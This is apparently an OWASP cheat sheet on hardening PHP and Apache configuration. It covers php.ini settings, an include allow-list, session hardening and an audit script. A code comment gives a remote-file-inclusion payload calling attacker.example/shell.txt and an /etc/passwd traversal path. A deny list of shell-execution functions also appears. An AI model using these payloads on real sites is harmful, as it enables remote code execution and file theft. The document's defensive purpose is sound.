PHP Configuration Cheat Sheet
Introduction
This page is part of the PHP Security Cheat Sheet, for developers and administrators. It describes secure configuration of PHP and its platform.
..: Work in Progress :..
Web Server Configuration
Apache
suPHP
suPHP is a CGI handler for Apache that runs every PHP script with the privileges of the script file's owner instead of the shared web-server user. With it you can upload and modify files in your own directories without making any directory world-writable (chmod 777), a very bad practice that lets any other user or compromised process on the host overwrite your files. Install and configure it on your web server. Because it runs PHP as CGI, each request starts a new interpreter; weigh that cost against the per-user isolation it provides.
PHP Configuration and Deployment
suhosin
Consider using Suhosin (Stefan Esser's [Hardened PHP patch]), a patch to the PHP core plus a loadable extension that hardens many parts of the engine and adds runtime protections against whole classes of flaws rather than single bugs. Check that a release exists for your PHP version before relying on it.
php.ini
Note that some of the following settings need to be adapted to your system, in particular the placeholders /path/ and /application/. Also read the PHP manual for the dependencies between settings (for example, allow_url_include only has an effect together with allow_url_fopen, and post_max_size must be at least as large as upload_max_filesize).
PHP error handling
expose_php = Off
error_reporting = E_ALL
display_errors = Off
display_startup_errors = Off
log_errors = On
error_log = /valid_path/PHP-logs/php_error.log
ignore_repeated_errors = Off
Keep in mind that display_errors must be Off on a production server: error messages leak file paths, SQL fragments and library versions to an attacker. Log errors to a file outside the document root instead, protect that file from web access, and review it regularly.
PHP general settings
doc_root = /path/DocumentRoot/PHP-scripts/
open_basedir = /path/DocumentRoot/PHP-scripts/
include_path = /path/PHP-pear/
extension_dir = /path/PHP-extensions/
mime_magic.magicfile = /path/PHP-magic.mime
allow_url_fopen = Off
allow_url_include = Off
variables_order = "GPSE"
allow_webdav_methods = Off
Setting allow_url_fopen and allow_url_include to Off stops a local file inclusion (LFI) from being escalated to a remote file inclusion (RFI): include/require can then no longer fetch http:// or ftp:// URLs. open_basedir confines every file operation to the listed directories; it takes a colon-separated list (semicolon on Windows), so add directories PHP itself must write to, such as /path/PHP-session/ from the session section below, if they lie outside the document root, because the file-based session handler applies the open_basedir check as well. Note that this variables_order omits C (cookies), so $_COOKIE is not populated; keep the C if your application reads cookies directly. mime_magic is an old extension; on PHP 5.3 and later use fileinfo instead.
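The following is an added example, not code from the original cheat sheet, showing why the allow_url_* directives matter and why they are only a backstop: the include itself has to be fixed. The templates/ directory, the template names and the ?page= parameter are assumptions; PHP 7 or later is assumed for the syntax.

```php
<?php
// Added example, not code from the original cheat sheet. Assumed layout:
// a templates/ directory beside this script and a ?page= request parameter.

// VULNERABLE: the include path comes straight from the request.
// With allow_url_include = On, ?page=http://attacker.example/shell.txt makes
// PHP fetch and execute remote code (RFI). With it Off, the same line is still
// a local file inclusion (?page=../../../../etc/passwd or a writable log file).
function render_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: map the request value onto a fixed allow-list of template files,
// so user input never reaches include/require as a path.
const TEMPLATE_DIR = __DIR__ . '/templates';
const TEMPLATES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function render_page_safe(string $page): void
{
    if (!isset(TEMPLATES[$page])) {
        http_response_code(404);
        echo "Unknown page\n";
        return;
    }
    // Belt and braces: resolve symlinks and '..' and confirm the result is
    // still inside TEMPLATE_DIR (the same containment open_basedir enforces).
    $base = realpath(TEMPLATE_DIR);
    $real = realpath(TEMPLATE_DIR . '/' . TEMPLATES[$page]);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(500);
        return;
    }
    include $real;
}

// Runtime check for the two directives from this section. ini_get() returns
// the raw php.ini string ("1", "", "On", "Off"...), so normalise it first.
function ini_bool(string $name): bool
{
    $v = strtolower((string) ini_get($name));
    return !in_array($v, ['', '0', 'off', 'false', 'no'], true);
}

function url_handling_locked_down(): bool
{
    return !ini_bool('allow_url_fopen') && !ini_bool('allow_url_include');
}

if (!url_handling_locked_down()) {
    error_log('allow_url_fopen/allow_url_include are still enabled');
}
render_page_safe($_GET['page'] ?? 'home');
```

The allow-list approach also protects against wrappers such as php://filter or data:, which allow_url_* do not block, so treat the php.ini setting as defence in depth rather than the fix.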
PHP file upload handling
file_uploads = On
upload_tmp_dir = /path/PHP-uploads/
max_file_uploads = 2
If your application does not accept file uploads, set file_uploads = Off. Otherwise keep upload_tmp_dir outside the document root so that an uploaded file can never be requested directly, and set max_file_uploads to the smallest number of files per request the application needs.
PHP executable handling
enable_dl = Off
disable_functions = system, exec, shell_exec, passthru, phpinfo, show_source, highlight_file, popen, proc_open, fopen_with_path, dbmopen, dbase_open, putenv, move_uploaded_file, chdir, mkdir, rmdir, chmod, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo
; see also: http://ir.php.net/features.safe-mode (safe_mode itself was removed in PHP 5.4)
disable_classes =
These are dangerous PHP functions (command execution, process handling, filesystem manipulation, information disclosure). Disable every one your application does not use. Two pitfalls: php.ini keeps only the last assignment of a directive, so disable_functions must be one comma-separated list, since splitting it over several lines silently re-enables everything except the last group; and show_source is an alias of highlight_file, so both must be listed. enable_dl must be Off, otherwise a script can load an arbitrary shared object with dl() and thereby run native code that bypasses disable_functions. Some names in the list (filepro*, dbmopen, fopen_with_path) belong to extensions that no longer exist in current PHP releases; listing them is harmless. Verify the result with function_exists(), which returns false for a disabled function.
PHP session handling
session.auto_start = Off
session.save_path = /path/PHP-session/
session.name = myPHPSESSID
session.hash_function = 1
session.hash_bits_per_character = 6
session.use_trans_sid = 0
session.cookie_domain = full.qualified.domain.name
;session.cookie_path = /application/path/
session.cookie_lifetime = 0
session.cookie_secure = On
session.cookie_httponly = 1
session.use_only_cookies = 1
session.cache_expire = 30
default_socket_timeout = 60
Changing session.name from the default PHPSESSID removes one obvious PHP fingerprint. session.use_only_cookies = 1 together with session.use_trans_sid = 0 makes PHP ignore session IDs passed in the URL, which defeats the simplest session-fixation attacks and keeps IDs out of logs and Referer headers. session.cookie_secure = On means the browser only sends the cookie over HTTPS, so the application must be served over HTTPS exclusively or sessions will not work. session.hash_function (1 = SHA-1) and session.hash_bits_per_character were removed in PHP 7.1, where session IDs are generated from random bytes and tuned with session.sid_length and session.sid_bits_per_character instead.
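For applications that cannot edit php.ini (shared hosting, or a baseline that must hold regardless of the host), the same session hardening can be applied at runtime. This is an added example, not code from the original page; the session name, the HTTPS detection via $_SERVER['HTTPS'] and the session.use_strict_mode directive (not in the list above; available since PHP 5.5.2) are assumptions.

```php
<?php
// Added example, not from the original cheat sheet. All session.* directives
// are PHP_INI_ALL, so ini_set() can change them as long as it runs before
// session_start(). Assumed: the app is only reachable over HTTPS.

function harden_session(string $name = 'myPHPSESSID'): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        throw new LogicException('harden_session() must run before session_start()');
    }
    // cookie_secure on a plain-HTTP request means the browser never returns
    // the cookie and every request gets a fresh session. Fail closed instead
    // of silently running without the Secure flag.
    $https = !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off';
    if (!$https) {
        throw new RuntimeException('Sessions require HTTPS');
    }

    ini_set('session.use_only_cookies', '1');  // ignore ?sid=... in the URL
    ini_set('session.use_trans_sid', '0');     // never rewrite IDs into links
    ini_set('session.use_strict_mode', '1');   // reject IDs this server did not issue (assumption: PHP >= 5.5.2)
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_secure', '1');
    ini_set('session.cookie_lifetime', '0');   // session cookie, dropped on browser close
    ini_set('session.cache_expire', '30');

    session_name($name);
    // lifetime, path, domain ('' = current host; put the FQDN from php.ini
    // here if you need it), secure, httponly
    session_set_cookie_params(0, '/', '', true, true);
    session_start();

    // Rotate the ID once per fresh session so that an ID an attacker planted
    // before login (session fixation) is never kept.
    if (empty($_SESSION['initiated'])) {
        session_regenerate_id(true);
        $_SESSION['initiated'] = true;
    }
}

harden_session();
```

Call session_regenerate_id(true) again at every privilege change (login, role switch), not only on the first request.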
Some more paranoid checks
session.referer_check = /application/path
memory_limit = 32M
post_max_size = 32M
max_execution_time = 60
report_memleaks = On
track_errors = Off
html_errors = Off
session.referer_check is a substring match: if the client sends a Referer header that does not contain /application/path, the session ID is treated as invalid. Requests without a Referer pass, and an attacker controls the header, so treat it as a nuisance for naive attacks rather than a control. memory_limit, post_max_size and max_execution_time cap what a single request can consume and limit resource-exhaustion attacks; post_max_size must be at least upload_max_filesize or uploads fail. html_errors = Off keeps any error output plain text. track_errors was deprecated in PHP 7.2 and removed in PHP 8.0.
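The error-handling, general, executable-handling and session settings above are only effective if the SAPI that serves the application actually loaded them. The following added audit script, not code from the original cheat sheet, compares the running configuration with that baseline. Run it through the same SAPI as the application (the CLI usually reads a different php.ini than mod_php or php-fpm) and delete it afterwards, because it discloses configuration details. The list of expected values is taken from the sections above; highlight_file is added as the alias of show_source.

```php
<?php
// Added example, not part of the original cheat sheet: audit the running PHP
// against the php.ini baseline described on this page.

// ini_get() returns the raw php.ini string; treat "", "0", "off", "false"
// and "no" as Off and anything else (including "stderr") as On.
function ini_bool(string $name): bool
{
    $v = strtolower((string) ini_get($name));
    return !in_array($v, ['', '0', 'off', 'false', 'no'], true);
}

// Directive => expected boolean value, from the sections above.
const EXPECTED = [
    'expose_php'               => false,
    'display_errors'           => false,
    'display_startup_errors'   => false,
    'log_errors'               => true,
    'allow_url_fopen'          => false,
    'allow_url_include'        => false,
    'enable_dl'                => false,
    'file_uploads'             => true,   // change to false if uploads are unused
    'session.use_only_cookies' => true,
    'session.use_trans_sid'    => false,
    'session.cookie_httponly'  => true,
    'session.cookie_secure'    => true,
    'session.auto_start'       => false,
    'html_errors'              => false,
];

// Functions the disable_functions line must switch off. function_exists()
// returns false for a function disabled via disable_functions.
const MUST_BE_DISABLED = [
    'system', 'exec', 'shell_exec', 'passthru', 'phpinfo', 'show_source',
    'highlight_file', 'popen', 'proc_open', 'putenv', 'posix_mkfifo',
];

function audit(): array
{
    $findings = [];
    foreach (EXPECTED as $directive => $want) {
        if (ini_bool($directive) !== $want) {
            $findings[] = sprintf('%s is "%s", expected %s',
                $directive, ini_get($directive), $want ? 'On' : 'Off');
        }
    }
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir is not set';
    }
    if ((string) ini_get('error_log') === '') {
        $findings[] = 'error_log is not set (errors go to the SAPI log or nowhere)';
    }
    if (error_reporting() !== E_ALL) {
        $findings[] = 'error_reporting is not E_ALL';
    }
    foreach (MUST_BE_DISABLED as $fn) {
        if (function_exists($fn)) {
            $findings[] = "$fn is still callable";
        }
    }
    if (session_name() === 'PHPSESSID') {
        $findings[] = 'session.name still has its default value';
    }
    return $findings;
}

$findings = audit();
header('Content-Type: text/plain');   // no-op on the CLI
if ($findings === []) {
    echo "OK: configuration matches the baseline\n";
} else {
    echo "FINDINGS:\n- " . implode("\n- ", $findings) . "\n";
}
```

A clean run only proves that the directives loaded; it says nothing about the web-server user, file permissions on error_log and session.save_path, or .htaccess/php_admin_value overrides for other virtual hosts, which need to be checked separately.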
PHP Database Settings
TBD: database settings should be done in the web server's configuration (i.e. httpd.conf).
PHP Database User
TBD: explain the pros and cons of what to set in php.ini and/or httpd.conf and/or the registry.
PHP Windows specific Settings
PHP Extension
Related Cheat Sheets
Authors and Primary Editors
Achim Hoffmann - Achim at owasp.org
--Achim, 30. November 2012